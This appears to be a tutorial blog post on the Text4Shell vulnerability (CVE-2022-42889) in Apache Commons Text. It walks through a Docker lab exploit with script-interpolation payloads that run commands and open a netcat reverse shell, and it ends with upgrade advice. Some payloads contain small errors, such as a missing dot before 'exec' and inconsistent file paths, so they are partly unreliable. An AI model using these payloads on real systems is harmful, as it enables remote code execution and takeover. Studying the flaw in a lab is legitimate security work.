CVE-2022–42889 Text4Shelll Vulnerability
Apache Common Text
Apache Commons Text is a library focused on algorithms that contains a number of useful utility methods for working with Strings, beyond what the core Java offers.
On the early October an apache common text vulnerability was published(CVE-2022–42889), at National Vulnerability Database this vulnerability base score is 9.8 with Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. From the base score we can conclude this vulnerability can be very dangerous because in short the attacks can be done over the network, easy to exploit, no need for privileges, no need to interact with other user and the high risk of confidentiality, integrity and availability.
Text4Shell is a vulnerability that effects Apache Commons Text Library. The general purpose of this library works as text manipulation toolkit, in this library the user can use the string substitution to change and replace the text. The actual vulnerability lies in Commons Text’s functionality to perform variable interpolation with a default interpolator allows for string lookup that can lead to remote code execution.
The affected version for this vulnerability are 1.5–1.9 and the affected interpolators are ‘script’, ‘dns’, and ‘url’. successful exploitation of this vulnerability with the crafted request can take full control over the vulnerable system.
Example
For this simulation, I am using my kali and run the vulnerable app(https://github.com/karthikuj/cve-2022-42889-text4shell-docker) on my docker environment. When you see the image below that means your docker is up and running.
Now all we need is to send the exploit code, the standard format for interpolation is “${prefix:name}”, where “prefix” is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation.
Lets try with the first prefix for the “script”
${script:javascript:java.lang.Runtime.getRuntime()exec(‘’)}
For the exec we will try the basic one to create blank file named hamsa using ‘touch’ command on the /root directory the payload will be like this.
${script:javascript:java.lang.Runtime.getRuntime()exec(‘touch /tmp/hamsa’)}
Now input the payload at ‘search’ parameter, if the 400 bad request happen it means we need to encode the payload first using url encode.
%24{script%3Ajavascript%3Ajava.lang.Runtime.getRuntime()exec(‘touch %2Fhamsa%2F’)}
After this we can jump into our docker and check the file at root folder and as we can see there is a hamsa file.
Now lets try to take the connection from the target using this payload where the ip is the docker’s ip. And don’s forget to url encode the payload
${script:javascript:java.lang.Runtime.getRuntime()exec(‘nc 172.17.0.1 7777 -e /bin/bash’)}
Now we need to use netcat as the listener
nc -lvnp 7777
After input the payload at the search parameter we can get the connection to the target as root id
Mitigation
Update the Apache Commons Text to the latest version (1.10)
